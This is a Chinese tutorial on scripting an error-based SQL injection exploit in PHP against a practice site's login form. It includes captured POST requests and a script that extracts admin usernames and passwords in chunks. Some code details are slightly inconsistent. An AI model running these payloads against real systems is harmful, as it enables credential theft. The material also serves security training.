上一篇介绍了注入 exp 的简单编写，这一篇将会提高难度，编写一些更复杂的 exp。
1、 post注入编写
访问暗月靶机测试系统，其登录页面存在报错注入。
查询数据的长度
'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#
因为 extractvalue 函数报错时只能回显 32 个字符长度的数据，所以先通过上面的语句获取数据的长度，再使用 substring 分段截取数据。
用php来编写exp
先用 Burp Suite 抓取数据包
POST /login.php HTTP/1.1
Host: www.moontester.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.moontester.com/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Connection: close
Cookie: PHPSESSID=k343qa72c7ro2psc0ivengqap6
Upgrade-Insecure-Requests: 1

username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95
2、模拟post进行url请求
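<?php

declare(strict_types=1);

/**
 * Send an application/x-www-form-urlencoded POST with cURL and return the response body.
 *
 * Returns false (rather than throwing) on empty input so existing callers that test
 * the result with if/else keep working.
 *
 * @param string               $url       Target URL.
 * @param array<string, mixed> $post_data Form fields as key => value pairs.
 * @return string|false Response body, or false when either argument is empty or the
 *                      request failed (curl_exec() returns false on transport errors).
 */
function request_post(string $url = '', array $post_data = []): string|false
{
    // Explicit comparisons instead of empty(): empty('0') is true, which would
    // silently reject a legitimate value.
    if ($url === '' || $post_data === []) {
        return false;
    }

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);         // exclude response headers from the returned body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
    curl_setopt($ch, CURLOPT_POST, 1);
    // http_build_query() percent-encodes keys as well as values (the hand-rolled
    // loop encoded only values) and needs no trailing "&" trimming.
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    $data = curl_exec($ch);
    curl_close($ch);

    return $data;
}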
使用 curl 需要 PHP 开启 curl 扩展：extension=php_curl.dll
这部分请求体中的字符串需要转换成 PHP 的数组。
username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=1234536&submit=%E7%99%BB%E5%BD%95
变成php数组
// The captured form fields as a PHP array; request_post() applies urlencode() to each
// value, so the values here are the decoded strings from the request body above.
$post_data=array("username"=>"'andextractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
整个exp的代码
<?php
/**
 * Send an application/x-www-form-urlencoded POST with cURL and return the response body.
 *
 * @param string $url       Target URL; an empty value short-circuits to false.
 * @param array  $post_data Form fields as key => value; each value is passed through urlencode().
 * @return string|false Response body, or false on empty input or cURL failure.
 */
function request_post($url = '', $post_data = array()) {
    if (empty($url) || empty($post_data)) {
        return false;
    }
    // Build the body by hand; the trailing "&" is trimmed below.
    $o = "";
    foreach ( $post_data as $k => $v ) {
        $o.= "$k=" . urlencode( $v ). "&" ;
    }
    $post_data = substr($o,0,-1);
    $postUrl = $url;
    $curlPost = $post_data;
    $ch = curl_init();//initialise the cURL handle
    curl_setopt($ch, CURLOPT_URL,$postUrl);//target URL
    curl_setopt($ch, CURLOPT_HEADER, 0);//exclude response headers from the returned body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//return the body as a string instead of printing it
    curl_setopt($ch, CURLOPT_POST, 1);//send as POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
    $data = curl_exec($ch);//execute the request
    curl_close($ch);
    return $data;
}

# Raw body as captured by the proxy (kept for reference; the array below is what is actually sent):
#$post_data="username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95";

// Same fields as a PHP array. Note: this top-level copy is never read —
// get_strlen() builds its own identical array.
$post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");

/**
 * Probe 1: obtain the length of the first admin row from the error message.
 *
 * This works only because the login page builds its query from the raw username
 * field and displays the database error text in the response; a prepared
 * statement, or not rendering driver errors to the client, removes that channel.
 *
 * @param string $url Login endpoint.
 * @return string The digits following "~" in the response. preg_match() is not
 *                checked, so $matches[1] is undefined when the marker is absent.
 */
function get_strlen($url){
    $post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
    $html = request_post($url,$post_data);
    preg_match("/~(\d+)/", $html,$matches);
    return $matches[1];
}

$url = "http://www.moontester.com/login.php";
$lengstr = get_strlen($url);
if($lengstr){
    // Probe 2: characters 1-32 of the row — extractvalue() surfaces at most 32 characters per error.
    $payload =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),1,32)))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
    $html = request_post($url,$payload);
    preg_match("/~#(.*?)\'/", $html,$matches);
    $m1 = $matches[1];
    // Probe 3: the rest of the row, from offset 32 up to the length found by probe 1.
    $payload2 =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat 
(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),32,{$lengstr})))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
    $html = request_post($url,$payload2);
    preg_match("/~(.*?)#/", $html,$matches);
    $m2 = $matches[1];
    // Both fragments are concatenated and printed.
    echo "[+]".$m1.$m2."[+]";
}else{
    echo "[-]error[-]";
}
代码解释
先获取数据的长度
第一次获取第 1-32 位的数据，第二次获取第 32-40 位的数据。
把两次获取的数据拼接在一起输出。